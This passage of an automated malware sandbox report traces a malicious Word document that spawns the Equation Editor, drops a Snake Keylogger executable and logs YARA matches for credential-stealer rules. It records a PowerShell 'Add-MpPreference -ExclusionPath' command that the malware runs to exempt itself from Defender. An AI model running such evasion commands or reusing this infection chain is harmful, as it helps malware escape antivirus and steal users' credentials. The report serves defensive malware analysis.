Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062AA59 7_2_0062AA59
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062305F 7_2_0062305F
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062C020 7_2_0062C020
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00623920 7_2_00623920
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625320 7_2_00625320
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062CD28 7_2_0062CD28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00624628 7_2_00624628
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626028 7_2_00626028
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625330 7_2_00625330
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062DA30 7_2_0062DA30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626D30 7_2_00626D30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062F731 7_2_0062F731
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626038 7_2_00626038
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627A3E 7_2_00627A3E
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00629000 7_2_00629000
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00620006 7_2_00620006
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00629D08 7_2_00629D08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062B308 7_2_0062B308
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062EE10 7_2_0062EE10
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00623910 7_2_00623910
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062C010 7_2_0062C010
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062461A 7_2_0062461A
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062B318 7_2_0062B318
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006268E2 7_2_006268E2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625BE0 7_2_00625BE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062E4E0 7_2_0062E4E0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006268E8 7_2_006268E8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006275F0 7_2_006275F0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00628FF0 7_2_00628FF0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006282F6 7_2_006282F6
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006282F8 7_2_006282F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062AEC0 7_2_0062AEC0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006241C0 7_2_006241C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062C8C1 7_2_0062C8C1
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006234C8 7_2_006234C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062BBC8 7_2_0062BBC8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00624ECE 7_2_00624ECE
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625BD2 7_2_00625BD2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062C8D0 7_2_0062C8D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006241D0 7_2_006241D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00624ED8 7_2_00624ED8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062D5D8 7_2_0062D5D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062FBD8 7_2_0062FBD8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006298A2 7_2_006298A2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627EA0 7_2_00627EA0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062F2A8 7_2_0062F2A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00628BA8 7_2_00628BA8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006298B0 7_2_006298B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062AEB0 7_2_0062AEB0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062BBB8 7_2_0062BBB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006234B9 7_2_006234B9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062D180 7_2_0062D180
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00624A80 7_2_00624A80
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626480 7_2_00626480
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625788 7_2_00625788
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062DE88 7_2_0062DE88
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627188 7_2_00627188
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626490 7_2_00626490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627198 7_2_00627198
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00628B98 7_2_00628B98
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627E9E 7_2_00627E9E
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692E78 7_2_00692E78
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00690040 7_2_00690040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00693558 7_2_00693558
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00693C38 7_2_00693C38
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00694318 7_2_00694318
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006949F8 7_2_006949F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00690ED8 7_2_00690ED8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006950D8 7_2_006950D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006957B8 7_2_006957B8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692E68 7_2_00692E68
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0069354A 7_2_0069354A
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00693C28 7_2_00693C28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692121 7_2_00692121
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692130 7_2_00692130
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00694308 7_2_00694308
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692B00 7_2_00692B00
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006949E9 7_2_006949E9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692AF2 7_2_00692AF2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006950C8 7_2_006950C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006957A8 7_2_006957A8
Yara signature match
Source: na.doc, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: pKL9HXcZosWfPt1[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: cmnjgwhesilo61000.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, hxMIVi9pYAP9wjI5QI.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, hxMIVi9pYAP9wjI5QI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: _0020.SetAccessControl
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: _0020.AddAccessRule
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, hxMIVi9pYAP9wjI5QI.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, hxMIVi9pYAP9wjI5QI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: _0020.SetAccessControl
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@9/14@26/9
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$na.doc Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRB5C7.tmp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................).........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................).........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................).........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................).........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................).........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................*.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n................................*.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P............................."*.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........B*.........................s............H....... ....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................p.......R*.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................p.......m*.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................p........*.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......*.........................s............H.......$....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................p........*.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................p........*.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................p........*.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................p........*.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................*.........................s....................l....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................+.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P..............................+.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................'+.........................s............H............................... Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: na.doc ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe" Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
